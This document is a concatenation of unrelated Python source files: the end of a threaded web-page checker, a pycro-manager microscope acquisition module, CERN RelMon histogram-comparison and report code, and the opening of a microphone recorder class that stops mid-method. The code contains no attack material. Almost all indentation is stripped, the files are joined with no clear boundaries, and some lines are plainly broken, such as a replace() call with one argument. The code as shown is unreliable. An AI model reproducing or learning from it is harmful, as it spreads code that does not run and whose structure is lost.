for url in self.urls:
if url != '':
t = threading.Thread(target=self.check_one, args=(url,))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
return self.dic
if __name__ == '__main__':
u = 'shai\nshooooooo\nhttp://www.stopfollow.com/\nhttps://tool.lu/'
p = 'href="http://www.miibeian.gov.cn/"'
k = Check(u,p)
print(k.run())
|
acquire.py
|
import numpy as np
import multiprocessing
import threading
from inspect import signature
import copy
import types
import time
from pycromanager.core import serialize_array, deserialize_array, Bridge
from pycromanager.data import Dataset
import warnings
import os.path
import queue
### These functions live outside the class to prevent pickling problems when running them in a different process
def _event_sending_fn(event_port, event_queue, debug=False):
bridge = Bridge(debug=debug)
event_socket = bridge._connect_push(event_port)
while True:
events = event_queue.get(block=True)
if debug:
print('got event(s):', events)
if events is None:
# Poison, time to shut down
event_socket.send({'events': [{'special': 'acquisition-end'}]})
event_socket.close()
return
event_socket.send({'events': events if type(events) == list else [events]})
if debug:
print('sent events')
def _acq_hook_startup_fn(pull_port, push_port, hook_connected_evt, event_queue, hook_fn, debug):
bridge = Bridge(debug=debug)
push_socket = bridge._connect_push(pull_port)
pull_socket = bridge._connect_pull(push_port)
hook_connected_evt.set()
while True:
event_msg = pull_socket.receive()
if 'special' in event_msg and event_msg['special'] == 'acquisition-end':
push_socket.send({})
push_socket.close()
pull_socket.close()
return
else:
if 'events' in event_msg.keys():
event_msg = event_msg['events'] #convert from sequence
params = signature(hook_fn).parameters
if len(params) == 1 or len(params) == 3:
try:
if len(params) == 1:
new_event_msg = hook_fn(event_msg)
elif len(params) == 3:
new_event_msg = hook_fn(event_msg, bridge, event_queue)
except Exception as e:
warnings.warn('exception in acquisition hook: {}'.format(e))
continue
else:
raise Exception('Incorrect number of arguments for hook function. Must be 1 or 3')
if isinstance(new_event_msg, list):
new_event_msg = {'events': new_event_msg} #convert back to the expected format for a sequence
push_socket.send(new_event_msg)
def _processor_startup_fn(pull_port, push_port, sockets_connected_evt, process_fn, event_queue, debug):
bridge = Bridge(debug=debug)
push_socket = bridge._connect_push(pull_port)
pull_socket = bridge._connect_pull(push_port)
if debug:
print('image processing sockets connected')
sockets_connected_evt.set()
def process_and_sendoff(image_tags_tuple):
if len(image_tags_tuple) != 2:
raise Exception('If image is returned, it must be of the form (pixel, metadata)')
if not image_tags_tuple[0].dtype == pixels.dtype:
raise Exception('Processed image pixels must have same dtype as input image pixels, '
'but instead they were {} and {}'.format(image_tags_tuple[0].dtype, pixels.dtype))
processed_img = {'pixels': serialize_array(image_tags_tuple[0]), 'metadata': image_tags_tuple[1]}
push_socket.send(processed_img)
while True:
message = None
while message is None:
message = pull_socket.receive(timeout=30) #check for new message
if 'special' in message and message['special'] == 'finished':
            push_socket.send(message)  # Continue propagating the finished signal
push_socket.close()
pull_socket.close()
return
metadata = message['metadata']
pixels = deserialize_array(message['pixels'])
image = np.reshape(pixels, [metadata['Height'], metadata['Width']])
params = signature(process_fn).parameters
if len(params) == 2 or len(params) == 4:
processed = None
try:
if len(params) == 2:
processed = process_fn(image, metadata)
elif len(params) == 4:
processed = process_fn(image, metadata, bridge, event_queue)
except Exception as e:
warnings.warn('exception in image processor: {}'.format(e))
continue
else:
raise Exception('Incorrect number of arguments for image processing function, must be 2 or 4')
if processed is None:
continue
if type(processed) == list:
for image in processed:
process_and_sendoff(image)
else:
process_and_sendoff(processed)
class Acquisition(object):
def __init__(self, directory=None, name=None, image_process_fn=None,
pre_hardware_hook_fn=None, post_hardware_hook_fn=None, post_camera_hook_fn=None,
show_display=True, tile_overlap=None, max_multi_res_index=None,
magellan_acq_index=None, magellan_explore=False, process=False, debug=False):
"""
:param directory: saving directory for this acquisition. Required unless an image process function will be
implemented that diverts images from saving
:type directory: str
:param name: Saving name for the acquisition. Required unless an image process function will be
implemented that diverts images from saving
:type name: str
        :param image_process_fn: image processing function that will be called on each image that gets acquired.
            Can either take two arguments (image, metadata), where image is a numpy array and metadata is a dict
            containing the corresponding image metadata, or four arguments (image, metadata, bridge, queue), where
            bridge is an instance of the pycromanager.acquire.Bridge object (for interacting with arbitrary code on
            the Java side, such as the micro-manager core) and queue is a Queue object that holds upcoming
            acquisition events. Both versions must either return an (image, metadata) tuple (or a list of such
            tuples) to be saved, or None to divert the image from saving
:param pre_hardware_hook_fn: hook function that will be run just before the hardware is updated before acquiring
a new image. In the case of hardware sequencing, it will be run just before a sequence of instructions are
dispatched to the hardware. Accepts either one argument (the current acquisition event) or three arguments
(current event, bridge, event Queue)
        :param post_hardware_hook_fn: hook function that will be run just after the hardware is updated, before acquiring
a new image. In the case of hardware sequencing, it will be run just after a sequence of instructions are
dispatched to the hardware, but before the camera sequence has been started. Accepts either one argument
(the current acquisition event) or three arguments (current event, bridge, event Queue)
:param post_camera_hook_fn: hook function that will be run just after the camera has been triggered to snapImage or
startSequence. A common use case for this hook is when one want to send TTL triggers to the camera from an
external timing device that synchronizes with other hardware. Accepts either one argument (the current
acquisition event) or three arguments (current event, bridge, event Queue)
:param tile_overlap: If given, XY tiles will be laid out in a grid and multi-resolution saving will be
            activated. Argument can be a two-element tuple describing the pixel overlaps between adjacent
tiles. i.e. (pixel_overlap_x, pixel_overlap_y), or an integer to use the same overlap for both.
For these features to work, the current hardware configuration must have a valid affine transform
between camera coordinates and XY stage coordinates
:type tile_overlap: tuple, int
:param max_multi_res_index: Maximum index to downsample to in multi-res pyramid mode. 0 is no downsampling,
1 is downsampled up to 2x, 2 is downsampled up to 4x, etc. If not provided, it will be dynamically
calculated and updated from data
:type max_multi_res_index: int
:param show_display: show the image viewer window
:type show_display: boolean
:param magellan_acq_index: run this acquisition using the settings specified at this position in the main
GUI of micro-magellan (micro-manager plugin). This index starts at 0
:type magellan_acq_index: int
:param magellan_explore: Run a Micro-magellan explore acquisition
:type magellan_explore: bool
:param process: Use multiprocessing instead of multithreading for acquisition hooks and image
processors. This can be used to speed up CPU-bounded processing by eliminating bottlenecks
caused by Python's Global Interpreter Lock, but also creates complications on Windows-based
systems
:type process: boolean
:param debug: print debugging stuff
:type debug: boolean
"""
self.bridge = Bridge(debug=debug)
self._debug = debug
self._dataset = None
if directory is not None:
            # Expand ~ in path
directory = os.path.expanduser(directory)
# If path is relative, retain knowledge of the current working directory
directory = os.path.abspath(directory)
if magellan_acq_index is not None:
magellan_api = self.bridge.get_magellan()
self._remote_acq = magellan_api.create_acquisition(magellan_acq_index)
self._event_queue = None
elif magellan_explore:
magellan_api = self.bridge.get_magellan()
self._remote_acq = magellan_api.create_explore_acquisition()
self._event_queue = None
else:
# Create thread safe queue for events so they can be passed from multiple processes
self._event_queue = multiprocessing.Queue() if process else queue.Queue()
core = self.bridge.get_core()
acq_factory = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcquisitionFactory', args=[core])
show_viewer = show_display and (directory is not None and name is not None)
if tile_overlap is None:
                # argument placeholders; these won't actually be used
x_overlap = 0
y_overlap = 0
else:
if type(tile_overlap) is tuple:
x_overlap, y_overlap = tile_overlap
else:
x_overlap = tile_overlap
y_overlap = tile_overlap
self._remote_acq = acq_factory.create_acquisition(directory, name, show_viewer, tile_overlap is not None,
x_overlap, y_overlap,
max_multi_res_index if max_multi_res_index is not None else -1)
storage = self._remote_acq.get_data_sink()
if storage is not None:
self.disk_location = storage.get_disk_location()
if image_process_fn is not None:
processor = self.bridge.construct_java_object('org.micromanager.remote.RemoteImageProcessor')
self._remote_acq.add_image_processor(processor)
self._start_processor(processor, image_process_fn, self._event_queue, process=process)
if pre_hardware_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self._remote_acq])
self._start_hook(hook, pre_hardware_hook_fn, self._event_queue, process=process)
self._remote_acq.add_hook(hook, self._remote_acq.BEFORE_HARDWARE_HOOK)
if post_hardware_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self._remote_acq])
self._start_hook(hook, post_hardware_hook_fn, self._event_queue, process=process)
self._remote_acq.add_hook(hook, self._remote_acq.AFTER_HARDWARE_HOOK)
if post_camera_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self._remote_acq])
self._start_hook(hook, post_camera_hook_fn, self._event_queue, process=process)
self._remote_acq.add_hook(hook, self._remote_acq.AFTER_CAMERA_HOOK)
self._remote_acq.start()
if magellan_acq_index is None and not magellan_explore:
self.event_port = self._remote_acq.get_event_port()
self.event_process = threading.Thread(target=_event_sending_fn,
args=(self.event_port, self._event_queue, self._debug),
name='Event sending')
self.event_process.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
        if self._event_queue is not None:  # magellan acquisitions don't have this
            # this should shut down storage and viewer as appropriate
            self._event_queue.put(None)
            # now wait for it to finish
self.await_completion()
def get_dataset(self):
"""
Return a :class:`~pycromanager.data.Dataset` object that has access to the underlying pixels
:return: :class:`~pycromanager.data.Dataset` corresponding to this acquisition
"""
if self._dataset is None:
self._dataset = Dataset(remote_storage=self._remote_acq.get_storage())
return self._dataset
def await_completion(self):
"""
Wait for acquisition to finish and resources to be cleaned up
"""
while (not self._remote_acq.is_finished()):
time.sleep(0.1)
def acquire(self, events, keep_shutter_open=False):
"""
Submit an event or a list of events for acquisition. Optimizations (i.e. taking advantage of
hardware synchronization, where available), will take place across this list of events, but not
over multiple calls of this method. A single event is a python dictionary with a specific structure
:param events: single event (i.e. a dictionary) or a list of events
        :param keep_shutter_open: don't close and reopen the shutter between events
"""
if keep_shutter_open and isinstance(events, list):
for e in events:
e['keep_shutter_open'] = True
            events.append({'keep_shutter_open': False})  # return to autoshutter; don't acquire an image
elif keep_shutter_open and isinstance(events, dict):
events['keep_shutter_open'] = True
            events = [events, {'keep_shutter_open': False}]  # return to autoshutter; don't acquire an image
self._event_queue.put(events)
def _start_hook(self, remote_hook, remote_hook_fn, event_queue, process):
hook_connected_evt = multiprocessing.Event() if process else threading.Event()
pull_port = remote_hook.get_pull_port()
push_port = remote_hook.get_push_port()
hook_thread = (multiprocessing.Process if process else threading.Thread)(
target=_acq_hook_startup_fn, name='AcquisitionHook',
args=(pull_port, push_port, hook_connected_evt, event_queue, remote_hook_fn, self._debug))
# if process else threading.Thread(target=_acq_hook_fn, args=(), name='AcquisitionHook')
hook_thread.start()
hook_connected_evt.wait() # wait for push/pull sockets to connect
def _start_processor(self, processor, process_fn, event_queue, process):
# this must start first
processor.start_pull()
sockets_connected_evt = multiprocessing.Event() if process else threading.Event()
pull_port = processor.get_pull_port()
push_port = processor.get_push_port()
self.processor_thread = (multiprocessing.Process if process else threading.Thread)(
target=_processor_startup_fn, args=(pull_port, push_port, sockets_connected_evt,
process_fn, event_queue, self._debug), name='ImageProcessor')
self.processor_thread.start()
sockets_connected_evt.wait() # wait for push/pull sockets to connect
processor.start_push()
def multi_d_acquisition_events(num_time_points=1, time_interval_s=0, z_start=None, z_end=None, z_step=None,
channel_group=None, channels=None, channel_exposures_ms=None, xy_positions=None, order='tpcz',
keep_shutter_open_between_channels=False, keep_shutter_open_between_z_steps=False):
"""
Convenience function for generating the events of a typical multi-dimensional acquisition (i.e. an
acquisition with some combination of multiple timepoints, channels, z-slices, or xy positions)
:param num_time_points: How many time points if it is a timelapse
:type num_time_points: int
:param time_interval_s: the minimum interval between consecutive time points in seconds. Keep at 0 to go as
fast as possible
:type time_interval_s: float
:param z_start: z-stack starting position, in µm
:type z_start: float
:param z_end: z-stack ending position, in µm
:type z_end: float
:param z_step: step size of z-stack, in µm
:type z_step: float
:param channel_group: name of the channel group (which should correspond to a config group in micro-manager)
:type channel_group: str
:param channels: list of channel names, which correspond to possible settings of the config group (e.g. ['DAPI',
'FITC'])
:type channels: list of strings
:param channel_exposures_ms: list of camera exposure times corresponding to each channel. The length of this list
        should be the same as the length of the list of channels
:type channel_exposures_ms: list of floats or ints
:param xy_positions: N by 2 numpy array where N is the number of XY stage positions, and the 2 are the X and Y
coordinates
:type xy_positions: numpy array
:param order: string that specifies the order of different dimensions. Must have some ordering of the letters
c, t, p, and z. For example, 'tcz' would run a timelapse where z stacks would be acquired at each channel in
series. 'pt' would move to different xy stage positions and run a complete timelapse at each one before moving
to the next
:type order: str
:param keep_shutter_open_between_channels: don't close the shutter in between channels
:type keep_shutter_open_between_channels: bool
:param keep_shutter_open_between_z_steps: don't close the shutter during steps of a z stack
:type keep_shutter_open_between_z_steps: bool
:return: a list of acquisition events to run the specified acquisition
"""
def generate_events(event, order):
if len(order) == 0:
yield event
return
elif order[0] == 't' and num_time_points != 1:
time_indices = np.arange(num_time_points)
for time_index in time_indices:
new_event = copy.deepcopy(event)
new_event['axes']['time'] = time_index
if time_interval_s != 0:
new_event['min_start_time'] = time_index * time_interval_s
yield generate_events(new_event, order[1:])
elif order[0] == 'z' and z_start is not None and z_end is not None and z_step is not None:
z_positions = np.arange(z_start, z_end, z_step)
for z_index, z_position in enumerate(z_positions):
new_event = copy.deepcopy(event)
new_event['axes']['z'] = z_index
new_event['z'] = z_position
if keep_shutter_open_between_z_steps:
new_event['keep_shutter_open'] = True
yield generate_events(new_event, order[1:])
elif order[0] == 'p' and xy_positions is not None:
for p_index, xy in enumerate(xy_positions):
new_event = copy.deepcopy(event)
new_event['axes']['position'] = p_index
new_event['x'] = xy[0]
new_event['y'] = xy[1]
yield generate_events(new_event, order[1:])
elif order[0] == 'c' and channel_group is not None and channels is not None:
for i in range(len(channels)):
new_event = copy.deepcopy(event)
new_event['channel'] = {'group': channel_group, 'config': channels[i]}
if channel_exposures_ms is not None:
                    new_event['exposure'] = channel_exposures_ms[i]
if keep_shutter_open_between_channels:
new_event['keep_shutter_open'] = True
yield generate_events(new_event, order[1:])
else:
#this axis appears to be missing
yield generate_events(event, order[1:])
#collect all events into a single list
base_event = {'axes': {}}
events = []
def appender(next):
if isinstance(next, types.GeneratorType):
for n in next:
appender(n)
else:
events.append(next)
appender(generate_events(base_event, order))
return events
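# Hypothetical usage sketch (not part of the original module): a small timelapse/z-stack
# acquisition built from the helpers above. Requires a running Micro-Manager instance
# with the pycro-manager server enabled; the directory and name values are illustrative.
def _acquisition_usage_sketch():
    events = multi_d_acquisition_events(num_time_points=4, time_interval_s=2,
                                        z_start=0, z_end=6, z_step=2, order='tz')
    with Acquisition(directory='/tmp/acq_demo', name='demo_acq') as acq:
        acq.acquire(events)
    # __exit__ signals the end of the event stream and waits for the acquisition to finish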
|
dirstructure.py
|
from __future__ import print_function
from __future__ import absolute_import
################################################################################
# RelMon: a tool for automatic Release Comparison
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/RelMon
#
#
#
# Danilo Piparo CERN - danilo.piparo@cern.ch
#
################################################################################
from builtins import range
from array import array
from copy import deepcopy
from os import chdir,getcwd,listdir,makedirs,rmdir
from os.path import exists,join
import sys
argv=sys.argv
from ROOT import *
sys.argv=argv
from .definitions import *
from .utils import setTDRStyle
# Something nice and familiar
setTDRStyle()
# Do not display the canvases
gROOT.SetBatch(kTRUE)
#-------------------------------------------------------------------------------
_log_level=5
def logger(msg_level,message):
if msg_level>=_log_level:
print("[%s] %s" %(asctime(),message))
#-------------------------------------------------------------------------------
class Weighted(object):
def __init__(self,name,weight=1):
self.name=name
self.weight=weight
#-------------------------------------------------------------------------------
class CompInfo(object):
def __init__(self,sample1="",sample2="",release1="",release2="",run1="",run2="",tier1=0,tier2=0):
self.sample1=sample1
self.sample2=sample2
self.release1=release1
self.release2=release2
self.run1=run1
self.run2=run2
self.tier1=tier1
self.tier2=tier2
#-------------------------------------------------------------------------------
class Directory(Weighted):
def __init__(self,name,mother_dir="",meta=CompInfo(),draw_success=False,do_pngs=False):
self.mother_dir=mother_dir
self.meta=meta
self.subdirs=[]
self.comparisons=[]
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.stats_calculated=False
Weighted.__init__(self,name)
self.draw_success=draw_success
self.do_pngs=do_pngs
self.rank_histo=TH1I("rh%s"%name,"",50,-0.01,1.001)
self.rank_histo.SetDirectory(0)
self.different_histograms = {}
self.different_histograms['file1']= {}
self.different_histograms['file2']= {}
self.filename1 = ""
self.filename2 = ""
self.n_missing_objs = 0
self.full_path = ""
def is_empty(self):
if len(self.subdirs)==0 and len(self.comparisons)==0:
return True
return False
def calcStats(self,make_pie=True):
        '''Walk all subdirs and calculate weight, fails and successes.
        Moreover, propagate the sample and release names.
'''
if self.stats_calculated:
return 0
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_missing_objs = len(self.different_histograms['file1'])+len(self.different_histograms['file2'])
if self.n_missing_objs != 0:
print(" [*] Missing in %s: %s" %(self.filename1, self.different_histograms['file1']))
print(" [*] Missing in %s: %s" %(self.filename2, self.different_histograms['file2']))
# clean from empty dirs
self.subdirs = [subdir for subdir in self.subdirs if not subdir.is_empty()]
for comp in self.comparisons:
            if comp.status == SKIPED:  # in case it is blacklisted and skipped
self.n_skiped += 1
self.n_comp_skiped += 1
self.weight+=1
else: #else original code -> to check for Fails and Successes
self.rank_histo.Fill(comp.rank)
self.weight+=1
if comp.status == FAIL:
self.n_fails+=1
self.n_comp_fails+=1
elif comp.status == SUCCESS:
self.n_successes+=1
self.n_comp_successes+=1
else:
self.n_nulls+=1
self.n_comp_nulls+=1
for subdir in self.subdirs:
subdir.mother_dir=join(self.mother_dir,self.name)
subdir.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
subdir.calcStats(make_pie)
subdir.meta=self.meta
self.weight+=subdir.weight
self.n_fails+=subdir.n_fails
self.n_successes+=subdir.n_successes
self.n_nulls+=subdir.n_nulls
self.n_skiped+=subdir.n_skiped
self.n_missing_objs += subdir.n_missing_objs
self.rank_histo.Add(subdir.rank_histo)
self.stats_calculated=True
self.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
#if make_pie:
#self.__create_pie_image()
def get_subdirs_dict(self):
subdirdict={}
for subdir in self.subdirs:
subdirdict[subdir.name]=subdir
return subdirdict
def get_subdirs_names(self):
subdirnames=[]
for subdir in self.subdirs:
subdirnames.append(subdir.name)
return subdirnames
def get_summary_chart_ajax(self,w=400,h=300):
"""Emit the ajax to build a pie chart using google apis...
"""
url = "https://chart.googleapis.com/chart?"
url+= "cht=p3" # Select the 3d chart
#url+= "&chl=Success|Null|Fail" # give labels
url+= "&chco=00FF00|FFFF00|FF0000|7A7A7A" # give colours to labels
url+= "&chs=%sx%s" %(w,h)
#url+= "&chtt=%s" %self.name
url+= "&chd=t:%.2f,%.2f,%.2f,%.2f"%(self.get_success_rate(),self.get_null_rate(),self.get_fail_rate(),self.get_skiped_rate())
return url
def print_report(self,indent="",verbose=False):
if len(indent)==0:
self.calcStats(make_pie=False)
# print small failure report
if verbose:
fail_comps=[comp for comp in self.comparisons if comp.status==FAIL]
fail_comps=sorted(fail_comps,key=lambda comp:comp.name )
if len(fail_comps)>0:
print(indent+"* %s/%s:" %(self.mother_dir,self.name))
for comp in fail_comps:
print(indent+" - %s: %s Test Failed (pval = %s) " %(comp.name,comp.test_name,comp.rank))
for subdir in self.subdirs:
subdir.print_report(indent+" ",verbose)
if len(indent)==0:
print("\n%s - summary of %s tests:" %(self.name,self.weight))
print(" o Failiures: %.2f%% (%s/%s)" %(self.get_fail_rate(),self.n_fails,self.weight))
print(" o Nulls: %.2f%% (%s/%s) " %(self.get_null_rate(),self.n_nulls,self.weight))
print(" o Successes: %.2f%% (%s/%s) " %(self.get_success_rate(),self.n_successes,self.weight))
print(" o Skipped: %.2f%% (%s/%s) " %(self.get_skiped_rate(),self.n_skiped,self.weight))
print(" o Missing objects: %s" %(self.n_missing_objs))
def get_skiped_rate(self):
if self.weight == 0: return 0
return 100.*self.n_skiped/self.weight
def get_fail_rate(self):
if self.weight == 0:return 0
return 100.*self.n_fails/self.weight
def get_success_rate(self):
if self.weight == 0:return 1
return 100.*self.n_successes/self.weight
def get_null_rate(self):
if self.weight == 0:return 0
return 100.*self.n_nulls/self.weight
def __get_full_path(self):
#print "Mother is %s" %self.mother_dir
if len(self.mother_dir)==0:
return self.name
return join(self.mother_dir,self.name)
def __create_on_disk(self):
if not exists(self.mother_dir) and len(self.mother_dir)!=0:
makedirs(self.mother_dir)
full_path=self.__get_full_path()
if not exists(full_path) and len(full_path)>0:
makedirs(full_path)
def get_summary_chart_name(self):
return join(self.__get_full_path(),"summary_chart.png")
def __create_pie_image(self):
self.__create_on_disk()
vals=[]
colors=[]
for n,col in zip((self.n_fails,self.n_nulls,self.n_successes,self.n_skiped),(kRed,kYellow,kGreen,kBlue)):
if n!=0:
vals.append(n)
colors.append(col)
valsa=array('f',vals)
colorsa=array('i',colors)
can = TCanvas("cpie","TPie test",100,100);
try:
pie = TPie("ThePie",self.name,len(vals),valsa,colorsa);
label_n=0
if self.n_fails!=0:
pie.SetEntryLabel(label_n, "Fail: %.1f(%i)" %(self.get_fail_rate(),self.n_fails) );
label_n+=1
if self.n_nulls!=0:
pie.SetEntryLabel(label_n, "Null: %.1f(%i)" %(self.get_null_rate(),self.n_nulls) );
label_n+=1
            if self.n_successes!=0:
                pie.SetEntryLabel(label_n, "Success: %.1f(%i)" %(self.get_success_rate(),self.n_successes) );
                label_n+=1
            if self.n_skiped!=0:
                pie.SetEntryLabel(label_n, "Skipped: %.1f(%i)" %(self.get_skiped_rate(),self.n_skiped));
pie.SetY(.52);
pie.SetAngularOffset(0.);
pie.SetLabelsOffset(-.3);
#pie.SetLabelFormat("#splitline{%val (%perc)}{%txt}");
pie.Draw("3d nol");
can.Print(self.get_summary_chart_name());
except:
print("self.name = %s" %self.name)
print("len(vals) = %s (vals=%s)" %(len(vals),vals))
print("valsa = %s" %valsa)
print("colorsa = %s" %colorsa)
def prune(self,expandable_dir):
"""Eliminate from the tree the directory the expandable ones.
"""
#print "pruning %s" %self.name
exp_index=-1
counter=0
for subdir in self.subdirs:
# Eliminate any trace of the expandable path in the mother directories
# for depths higher than 1
subdir.mother_dir=subdir.mother_dir.replace("/"+expandable_dir,"")
if subdir.name==expandable_dir:
exp_index=counter
counter+=1
# Did we find an expandable?
if exp_index>=0:
exp_dir=self.subdirs[exp_index]
for subsubdir in exp_dir.subdirs:
#print "*******",subsubdir.mother_dir,
subsubdir.mother_dir=subsubdir.mother_dir.replace("/"+expandable_dir,"")
while "//" in subsubdir.mother_dir:
print(subsubdir.mother_dir)
subsubdir.mother_dir=subsubdir.mother_dir.replace("//","/")
#print "*******",subsubdir.mother_dir
self.subdirs.append(subsubdir)
for comp in exp_dir.comparisons:
comp.mother_dir=comp.mother_dir.replace("/"+expandable_dir,"")
while "//" in comp.mother_dir:
comp.mother_dir
comp.mother_dir=comp.mother_dir.replace("/")
if not comp in self.comparisons: #in case not to append same comparisons few times
self.comparisons.append(comp) # add a comparison
self.n_comp_fails = exp_dir.n_comp_fails #copy to-be removed directory
self.n_comp_nulls = exp_dir.n_comp_nulls # numbers to parent directory
self.n_comp_successes = exp_dir.n_comp_successes
self.n_comp_skiped = exp_dir.n_comp_skiped
del self.subdirs[exp_index]
self.prune(expandable_dir)
for subdir in self.subdirs:
subdir.prune(expandable_dir)
def __repr__(self):
if self.is_empty():
return "%s seems to be empty. Please check!" %self.name
content="%s , Rates: Success %.2f%%(%s) - Fail %.2f%%(%s) - Null %.2f%%(%s)\n" %(self.name,self.get_success_rate(),self.n_successes,self.get_fail_rate(),self.n_fails,self.get_null_rate(),self.n_nulls)
for subdir in self.subdirs:
content+=" %s\n" % subdir
for comp in self.comparisons:
content+=" %s\n" % comp
return content
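# Hedged usage sketch (not called anywhere in this module): once a root Directory
# has been populated elsewhere with sub-directories and Comparison objects, the
# reporting entry points above are typically driven like this. The "Run summary"
# expandable level is an assumption taken from the path handling in calcStats().
def _example_directory_report(root_directory):
    root_directory.prune("Run summary")        # collapse the expandable level
    root_directory.calcStats(make_pie=False)   # aggregate fails/successes/nulls/skips
    root_directory.print_report(verbose=True)  # per-directory failure listing
    return root_directory.get_summary_chart_ajax()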
#-------------------------------------------------------------------------------
from multiprocessing import Process
def print_multi_threaded(canvas,img_name):
canvas.Print(img_name)
tcanvas_print_processes=[]
#-------------------------------------------------------------------------------
class Comparison(Weighted):
canvas_xsize=500
canvas_ysize=400
def __init__(self,name,mother_dir,h1,h2,stat_test,draw_success=False,do_pngs=False, skip=False):
self.name=name
self.png_name="placeholder.png"
self.mother_dir=mother_dir
self.img_name=""
#self.draw_success=draw_success
Weighted.__init__(self,name)
stat_test.set_operands(h1,h2)
if skip:
self.status = SKIPED
            self.test_name=stat_test.name
            self.test_thr=stat_test.threshold
            self.rank = 0
else:
self.status=stat_test.get_status()
self.rank=stat_test.get_rank()
self.test_name=stat_test.name
self.test_thr=stat_test.threshold
self.do_pngs=do_pngs
self.draw_success=draw_success or not do_pngs
if ((self.status==FAIL or self.status==NULL or self.status == SKIPED or self.draw_success) and self.do_pngs):
self.__make_image(h1,h2)
#self.__make_image(h1,h2)
def __make_img_dir(self):
if not exists(self.mother_dir):
makedirs(self.mother_dir)
def __get_img_name(self):
#self.__make_img_dir()
#print "MOTHER: ",self.mother_dir
self.img_name="%s/%s.png"%(self.mother_dir,self.name)
self.img_name=self.img_name.replace("Run summary","")
self.img_name=self.img_name.replace("/","_")
self.img_name=self.img_name.strip("_")
#print "IMAGE NAME: %s " %self.img_name
return self.img_name
def tcanvas_slow(self,canvas):
#print "About to print %s" %self.img_name
#print_multi_threaded(canvas,self.img_name)
#print "-->Printed"
p = Process(target=print_multi_threaded, args=(canvas,self.img_name))
p.start()
tcanvas_print_processes.append(p)
n_proc=len(tcanvas_print_processes)
if n_proc>3:
p_to_remove=[]
for iprocess in range(0,n_proc):
p=tcanvas_print_processes[iprocess]
p.join()
p_to_remove.append(iprocess)
adjustment=0
for iprocess in p_to_remove:
tcanvas_print_processes.pop(iprocess-adjustment)
adjustment+=1
def __make_image(self,obj1,obj2):
self.img_name=self.__get_img_name()
if self.rank==-1:
return 0
canvas=TCanvas(self.name,self.name,Comparison.canvas_xsize,Comparison.canvas_ysize)
objs=(obj1,obj2)
# Add some specifics for the graphs
obj1.SetTitle(self.name)
        if obj1.GetNbinsY()!=0 and "2" not in obj1.ClassName():
            obj1.SetLineWidth(2)
            obj2.SetLineWidth(2)
obj1.SetMarkerStyle(8)
obj1.SetMarkerSize(.8)
obj2.SetMarkerStyle(8)
obj2.SetMarkerSize(.8)
obj1.SetMarkerColor(kBlue)
obj1.SetLineColor(kBlue)
obj2.SetMarkerColor(kRed)
obj2.SetLineColor(kRed)
obj1.Draw("EP")
#Statsbox
obj2.Draw("HistSames")
#gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
else:
obj1.Draw("Colz")
gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
obj2.Draw("ColSame")
# Put together the TLatex for the stat test if possible
color=kGreen+2 # which is green, as everybody knows
if self.status==FAIL:
print("This comparison failed %f" %self.rank)
color=kRed
elif self.status==NULL:
color=kYellow
elif self.status==SKIPED:
color=kBlue #check if kBlue exists ;)
lat_text="#scale[.7]{#color[%s]{%s: %2.2f}}" %(color,self.test_name,self.rank)
lat=TLatex(.1,.91,lat_text)
lat.SetNDC()
lat.Draw()
# Put also the stats together!
n1=obj1.GetEntries()
if n1> 100000:
n1="%e"%n1
else:
n1="%s"%n1
n2=obj2.GetEntries()
if n2> 100000:
n2="%e"%n2
else:
n2="%s"%n2
lat_text1="#scale[.7]{#color[%s]{Entries: %s}}" %(obj1.GetLineColor(),n1)
lat1=TLatex(.3,.91,lat_text1)
lat1.SetNDC()
lat1.Draw()
lat_text2="#scale[.7]{#color[%s]{Entries: %s}}" %(obj2.GetLineColor(),n2)
lat2=TLatex(.6,.91,lat_text2)
lat2.SetNDC()
lat2.Draw()
self.tcanvas_slow(canvas)
def __repr__(self):
return "%s , (%s=%s). IMG=%s. status=%s" %(self.name,self.test_name,self.rank,self.img_name,self.status)
#-------------------------------------------------------------------------------
|
recorder.py
|
# Part of the code has been updated from
# http://www.swharden.com/wp/2013-05-09-realtime-fft-audio-visualization-with-python/
# Author: Scott W Harden: neuroscientist, dentist, molecular biologist, code monkey (2013)
import matplotlib
matplotlib.use('TkAgg') # <-- THIS MAKES IT FAST!
import numpy
import scipy
import struct
import pyaudio
import threading
import pylab
class SwhRecorder:
"""Simple, cross-platform class to record from the microphone."""
def __init__(self):
"""minimal garb is executed when class is loaded."""
        self.BUFFERSIZE=2**13 # 8192 samples per buffer (1024 also works)
self.secToRecord=.1
self.threadsDieNow=False
self.newAudio=False
# Set sampling rate (in Hz).
        # Typical rates: {8000, 11025, 22050, 44100, 48000} Hz
        self.RATE = 44100
        # Choose response type.
        # Note: {'fast' = ~125 ms, 'slow' = ~1.0 s}
        self.responseType = 'fast'
        # Set calibration constant.
        # Note: A quiet location will be ~55 dBA.
        self.C = 50
def setup(self):
"""initialize sound card."""
#TODO - windows detection vs. alsa or something for linux
#TODO - try/except for sound card selection/initiation
if self.responseType=='slow':
self.secToRecord=1.0
else:
self.secToRecord= 0.125
self.buffersToRecord=int(self.RATE*self.secToRecord/self.BUFFERSIZE)
if self.buffersToRecord==0: self.buffersToRecord=1
